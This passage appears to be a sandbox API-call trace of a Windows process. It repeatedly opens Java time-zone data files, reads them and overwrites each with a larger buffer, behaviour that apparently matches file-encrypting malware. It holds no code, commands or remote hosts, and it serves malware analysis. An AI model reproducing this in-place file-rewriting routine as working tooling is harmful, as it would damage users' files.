lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x225 [0135.991] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.991] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.991] ReleaseMutex (hMutex=0x168) returned 1 [0135.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cordoba", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0135.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cordoba", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cordoba", lpUsedDefaultChar=0x0) returned 7 [0135.992] ReadFile (in: hFile=0x20c, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x225, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2d5f2bc*=0x225, lpOverlapped=0x0) returned 1 [0135.993] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.993] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7ad, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x7ad, lpOverlapped=0x0) returned 1 [0135.993] CloseHandle (hObject=0x20c) returned 1 [0135.993] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.994] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.994] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x235 [0135.994] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.994] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.994] ReleaseMutex (hMutex=0x168) returned 1 [0135.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tucuman", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0135.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tucuman", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tucuman", lpUsedDefaultChar=0x0) returned 7 [0135.995] ReadFile (in: hFile=0x20c, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x235, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2d5f2bc*=0x235, lpOverlapped=0x0) returned 1 [0135.996] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.996] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7bd, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x7bd, lpOverlapped=0x0) returned 1 [0135.996] CloseHandle (hObject=0x20c) returned 1 [0135.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.997] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.997] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x129 [0135.997] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.997] ReleaseMutex (hMutex=0x168) returned 1 [0135.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Belem", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Belem", cchWideChar=5, lpMultiByteStr=0x1f7acfc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Belem", lpUsedDefaultChar=0x0) returned 5 [0135.997] ReadFile (in: hFile=0x20c, lpBuffer=0x1f21e28, nNumberOfBytesToRead=0x129, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f21e28*, lpNumberOfBytesRead=0x2d5f2bc*=0x129, lpOverlapped=0x0) returned 1 [0135.998] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.998] WriteFile (in: hFile=0x20c, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6b1, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6b1, lpOverlapped=0x0) returned 1 [0135.998] CloseHandle (hObject=0x20c) returned 1 [0135.999] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0136.000] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0136.000] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x318 [0136.000] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0136.000] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.000] ReleaseMutex (hMutex=0x168) returned 1 [0136.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cancun", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cancun", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cancun", lpUsedDefaultChar=0x0) returned 6 [0136.001] ReadFile (in: hFile=0x20c, lpBuffer=0x1e96468, nNumberOfBytesToRead=0x318, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e96468*, lpNumberOfBytesRead=0x2d5f2bc*=0x318, lpOverlapped=0x0) returned 1 [0136.604] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0136.604] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x8a0, lpOverlapped=0x0) returned 1 [0136.605] CloseHandle (hObject=0x20c) returned 1 [0136.605] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.807] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0136.808] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x44c [0136.808] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0136.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.808] ReleaseMutex (hMutex=0x168) returned 1 [0136.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cuiaba", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cuiaba", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cuiaba", lpUsedDefaultChar=0x0) returned 6 [0136.808] ReadFile (in: hFile=0x1f0, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x44c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x2d5f2bc*=0x44c, lpOverlapped=0x0) returned 1 [0136.930] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0136.930] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9d4, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x9d4, lpOverlapped=0x0) returned 1 [0136.930] CloseHandle (hObject=0x1f0) returned 1 [0136.931] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.931] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0136.931] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x524 [0136.932] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0136.932] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.932] ReleaseMutex (hMutex=0x168) returned 1 [0136.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Edmonton", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Edmonton", cchWideChar=8, lpMultiByteStr=0x1f732cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Edmonton", lpUsedDefaultChar=0x0) returned 8 [0136.932] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x524, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2d5f2bc*=0x524, lpOverlapped=0x0) returned 1 [0137.706] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0137.706] WriteFile (in: hFile=0x1f0, lpBuffer=0x25acd08*, nNumberOfBytesToWrite=0xaac, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25acd08*, lpNumberOfBytesWritten=0x2d5f2d0*=0xaac, lpOverlapped=0x0) returned 1 [0137.706] CloseHandle (hObject=0x1f0) returned 1 [0137.707] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grenada"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0137.708] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.708] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0137.708] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.708] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.708] ReleaseMutex (hMutex=0x168) returned 1 [0137.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grenada", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0137.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grenada", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grenada", lpUsedDefaultChar=0x0) returned 7 [0137.708] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0137.709] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0137.709] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0137.710] CloseHandle (hObject=0x1f0) returned 1 [0137.710] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0137.711] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.711] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x364 [0137.711] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.711] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.711] ReleaseMutex (hMutex=0x168) returned 1 [0137.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Indianapolis", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Indianapolis", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Indianapolis", lpUsedDefaultChar=0x0) returned 12 [0137.711] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a4b98, nNumberOfBytesToRead=0x364, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a4b98*, lpNumberOfBytesRead=0x2d5f2bc*=0x364, lpOverlapped=0x0) returned 1 [0137.834] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0137.834] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x8ec, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2d5f2d0*=0x8ec, lpOverlapped=0x0) returned 1 [0137.835] CloseHandle (hObject=0x1f0) returned 1 [0137.835] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0137.836] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.842] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x424 [0137.842] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.842] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.842] ReleaseMutex (hMutex=0x168) returned 1 [0137.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inuvik", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0137.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inuvik", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Inuvik", lpUsedDefaultChar=0x0) returned 6 [0137.843] ReadFile (in: hFile=0x1f0, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x424, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x2d5f2bc*=0x424, lpOverlapped=0x0) returned 1 [0137.945] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0137.945] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ac, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x9ac, lpOverlapped=0x0) returned 1 [0137.946] CloseHandle (hObject=0x1f0) returned 1 [0137.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0137.947] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.947] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x618 [0137.947] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.947] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.947] ReleaseMutex (hMutex=0x168) returned 1 [0137.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Los_Angeles", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Los_Angeles", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Los_Angeles", lpUsedDefaultChar=0x0) returned 11 [0137.948] ReadFile (in: hFile=0x1f0, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x618, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x2d5f2bc*=0x618, lpOverlapped=0x0) returned 1 [0137.997] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0137.997] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a5b78*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a5b78*, lpNumberOfBytesWritten=0x2d5f2d0*=0xba0, lpOverlapped=0x0) returned 1 [0137.998] CloseHandle (hObject=0x1f0) returned 1 [0137.998] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0137.999] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.999] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x314 [0137.999] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0137.999] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.999] ReleaseMutex (hMutex=0x168) returned 1 [0137.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Merida", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0137.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Merida", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Merida", lpUsedDefaultChar=0x0) returned 6 [0137.999] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x314, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x2d5f2bc*=0x314, lpOverlapped=0x0) returned 1 [0138.044] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0138.044] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x89c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2d5f2d0*=0x89c, lpOverlapped=0x0) returned 1 [0138.045] CloseHandle (hObject=0x1f0) returned 1 [0138.045] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montserrat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 